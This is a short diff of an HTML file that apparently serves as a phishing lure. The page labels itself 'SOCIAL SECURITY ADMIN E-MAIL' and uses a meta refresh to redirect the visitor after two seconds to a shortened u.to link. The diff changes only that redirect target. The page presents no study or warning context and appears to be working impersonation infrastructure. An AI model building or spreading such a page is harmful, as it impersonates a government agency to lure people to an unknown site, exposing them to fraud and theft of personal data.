--- a/f-cw (2).html
+++ b/f-cw (2).html
@@ -2,7 +2,7 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://u.to/SnJvIg" />
+<meta http-equiv="refresh" content="2; url = https://u.to/23xwIg" />
 </head>
 <P> SOCIAL SECURITY ADMIN E-MAIL
 <body>
